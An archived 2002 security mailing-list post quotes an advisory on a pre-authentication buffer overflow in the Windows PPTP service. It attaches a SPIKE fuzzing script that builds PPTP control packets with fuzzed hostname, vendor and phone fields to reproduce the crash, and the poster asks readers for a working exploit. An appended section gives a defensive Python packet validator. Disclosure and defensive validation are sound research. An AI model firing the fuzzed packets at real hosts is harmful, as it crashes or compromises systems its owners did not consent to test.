From: dave at immunitysec.com (Dave Aitel)
Subject: Re: Microsoft PPTP Server and Client remote vulnerability

SPIKE 2.6.2 or above should be able to handle this .spk file, which will
replicate the vulnerability. Someone send me a working sploit in exchange,
please. I'm too lazy to muck with it. (Or I have other exploits to muck
with, one or the other :>)

-dave

P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy) at
http://www.immunitysec.com/spike.html, if you haven't already.

P.P.S. This script is released under the terms of the GNU GPL v 2.0.

On Thu, 2002-09-26 at 05:43, sh@...on.com wrote:
> phion Security Advisory 26/09/2002
>
> Microsoft PPTP Server and Client remote vulnerability
>
>
> Summary
> -----------------------------
>
> The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
> remotely exploitable pre-authentication buffer overflow.
>
>
> Affected Systems
> -----------------------------
>
> Microsoft Windows 2000 and XP running either a PPTP Server or Client.
>
>
> Impact
> -----------------------------
>
> With a specially crafted PPTP packet it is possible to overwrite kernel
> memory.
>
> A DoS resulting in a lockup of the machine has been verified on
> Windows 2000 SP3 and Windows XP.
>
> A remote compromise should be possible deploying proper shellcode,
> as we were able to fill EDI and EDX with our data.
>
> Clients are vulnerable too, because the Service always listens on port
> 1723 on any interface of the machine; this might be of special concern
> to DSL users who use PPTP to connect to their modem.
>
>
> Solution
> -----------------------------
>
> As a temporary solution for the Client issue, one might firewall the PPTP
> port in the Internet Connection Firewall for Windows XP.
>
> We don't know of any solution for Windows 2000 and Windows XP PPTP servers.
>
> The vendor has been informed.
>
>
> Acknowledgements
> -----------------------------
>
> The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
> on behalf of phion Information Technologies.
>
>
> Contact Information
> -----------------------------
>
> phion Information Technologies can be reached via:
> office@...on.com / http://www.phion.com
>
> Stephan Hoffmann can be reached via:
> sh@...on.com
>
> Thomas Unterleitner can be reached via:
> t.unterleitner@...on.com
>
> References
> -----------------------------
>
> [1] phion Information Technologies
> http://www.phion.com/
>
> Exploit
> -----------------------------
>
> phion Information Technologies will not provide an exploit for this issue.
>
>
> Disclaimer
> -----------------------------
>
> This advisory does not claim to be complete or to be usable for any
> purpose.
>
> This advisory is free for open distribution in unmodified form.
>
> Articles or Publications that are based on information from this advisory
> have to include link [1].
>

-------------- next part --------------
//start control request (PPTP Start-Control-Connection-Request)
s_block_start("PPTP");
//length: size of the whole PPTP block, big-endian halfword
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 - control message
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//control message type 1 - start control connection request
//5 is big-endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);
//hostname (fuzzed string followed by 63 bytes of padding)
s_string_variable("A");
s_binary_repeat("00",63);
//vendor (fuzzed string followed by 63 bytes of padding)
s_string_variable("A");
s_binary_repeat("00",63);
s_block_end("PPTP");

///
/// NEXT PACKET
///
///

//start outgoing call request (PPTP Outgoing-Call-Request)
s_block_start("PPTP2");
//length: size of the whole PPTP2 block, big-endian halfword
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 - control message
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//control message type 7 - outgoing call request
//5 is big-endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");
//call id
s_binary("0000");
//serial number
s_binary("0000");
//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//receive window size
s_binary("0003");
//processing delay
s_binary("0000");
//phone number length: size of the PHONENUMBER block below
s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
//phone number (fuzzed string)
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress (fuzzed string)
s_string_variable("");
s_block_end("PPTP2");

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 232 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020926/41a8850f/attachment.bin
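As an added example, not part of Dave Aitel's post, the phion advisory, or SPIKE itself: a defender-side validator for the two PPTP control messages the script above emits. It decodes the control header and the Start-Control-Connection-Request and Outgoing-Call-Request bodies using the fixed layouts from RFC 2637 (12-byte header; 144- and 156-byte bodies; 64-octet string fields for hostname, vendor, phone number and subaddress), and rejects a message whose length field disagrees with the wire size, whose magic cookie is wrong, or whose fixed-size string fields carry no NUL terminator. The sample packets are constructed inline and use the same option values the .spk file hard-codes (framing 3, bearer 2, 2400/10000000 bps); the field names and builder helpers are this example's own.

```python
import struct

# RFC 2637 layout constants (protocol facts, not taken from the post).
PPTP_MAGIC = 0x1A2B3C4D
CTRL_HDR_LEN = 12                   # length(2) type(2) cookie(4) ctrl_type(2) reserved(2)
SCCRQ, OCRQ = 1, 7                  # Start-Control-Connection-Request, Outgoing-Call-Request
BODY_LEN = {SCCRQ: 144, OCRQ: 156}  # fixed body size per control message type
FIXED_STR = 64                      # hostname, vendor, phone number, subaddress


def _check_fixed_string(name, field):
    """A 64-octet string field must contain a NUL terminator; return the string before it."""
    if len(field) != FIXED_STR or b"\x00" not in field:
        raise ValueError("%s field is not NUL-terminated within %d octets" % (name, FIXED_STR))
    return field.split(b"\x00", 1)[0]


def parse_control_message(pkt):
    """Decode one PPTP control message, raising ValueError on any inconsistency."""
    if len(pkt) < CTRL_HDR_LEN:
        raise ValueError("truncated control header")
    length, msg_type, cookie, ctrl_type, _ = struct.unpack("!HHIHH", pkt[:CTRL_HDR_LEN])
    if cookie != PPTP_MAGIC:
        raise ValueError("bad magic cookie 0x%08x" % cookie)
    if msg_type != 1:
        raise ValueError("message type %d is not a control message" % msg_type)
    if ctrl_type not in BODY_LEN:
        raise ValueError("unsupported control message type %d" % ctrl_type)
    expected = CTRL_HDR_LEN + BODY_LEN[ctrl_type]
    # The declared length, the RFC size for this type and the buffer size must all agree.
    if length != expected or len(pkt) != expected:
        raise ValueError("length mismatch: header=%d expected=%d actual=%d"
                         % (length, expected, len(pkt)))
    body = pkt[CTRL_HDR_LEN:]
    if ctrl_type == SCCRQ:
        version, _, framing, bearer, max_chan, firmware = struct.unpack("!HHIIHH", body[:16])
        return {"type": "SCCRQ", "version": version, "framing": framing, "bearer": bearer,
                "max_channels": max_chan, "firmware": firmware,
                "hostname": _check_fixed_string("hostname", body[16:80]),
                "vendor": _check_fixed_string("vendor", body[80:144])}
    (call_id, serial, min_bps, max_bps, bearer, framing,
     rws, delay, phone_len, _) = struct.unpack("!HHIIIIHHHH", body[:28])
    if phone_len > FIXED_STR:
        raise ValueError("phone number length %d exceeds field size" % phone_len)
    phone = _check_fixed_string("phone number", body[28:92])
    if len(phone) != phone_len:
        raise ValueError("phone number length %d disagrees with string length %d"
                         % (phone_len, len(phone)))
    return {"type": "OCRQ", "call_id": call_id, "serial": serial, "min_bps": min_bps,
            "max_bps": max_bps, "bearer": bearer, "framing": framing, "rws": rws,
            "delay": delay, "phone_number": phone,
            "subaddress": _check_fixed_string("subaddress", body[92:156])}


def validate(pkt):
    """(True, fields) for a well-formed message, (False, reason) otherwise."""
    try:
        return True, parse_control_message(pkt)
    except ValueError as exc:
        return False, str(exc)


# --- constructed sample messages (builders are this example's own helpers) ---

def _fixed(s):
    """Zero-pad a short byte string into a 64-octet field, leaving room for the NUL."""
    if len(s) >= FIXED_STR:
        raise ValueError("string too long for a %d-octet field" % FIXED_STR)
    return s.ljust(FIXED_STR, b"\x00")


def build_sccrq(hostname=b"example-host", vendor=b"example-vendor"):
    """Well-formed SCCRQ: version 1.0, framing 3, bearer 2, max channels 0xffff, firmware 1."""
    body = struct.pack("!HHIIHH", 0x0100, 0, 3, 2, 0xFFFF, 1) + _fixed(hostname) + _fixed(vendor)
    return struct.pack("!HHIHH", CTRL_HDR_LEN + len(body), 1, PPTP_MAGIC, SCCRQ, 0) + body


def build_ocrq(phone=b"", subaddress=b""):
    """Well-formed OCRQ: 2400..10000000 bps, bearer 2, framing 3, window 3, delay 0."""
    body = (struct.pack("!HHIIIIHHHH", 0, 0, 2400, 10000000, 2, 3, 3, 0, len(phone), 0)
            + _fixed(phone) + _fixed(subaddress))
    return struct.pack("!HHIHH", CTRL_HDR_LEN + len(body), 1, PPTP_MAGIC, OCRQ, 0) + body


GOOD = build_sccrq()                                  # clean 156-byte SCCRQ
BAD_LENGTH = struct.pack("!H", 0xFFFF) + GOOD[2:]     # length field inflated
BAD_HOSTNAME = GOOD[:28] + b"A" * 64 + GOOD[92:]      # hostname field with no NUL inside it

if __name__ == "__main__":
    for name, pkt in (("good", GOOD), ("bad_length", BAD_LENGTH),
                      ("bad_hostname", BAD_HOSTNAME), ("ocrq", build_ocrq(b"5551234"))):
        print(name, validate(pkt))
```

The three checks that matter operationally are the ones the header alone cannot give you: the declared length must equal both the RFC size for the type and the bytes actually received, and every fixed-size string field must contain its terminator. A listener that accepts either discrepancy is trusting the peer to bound its own copies.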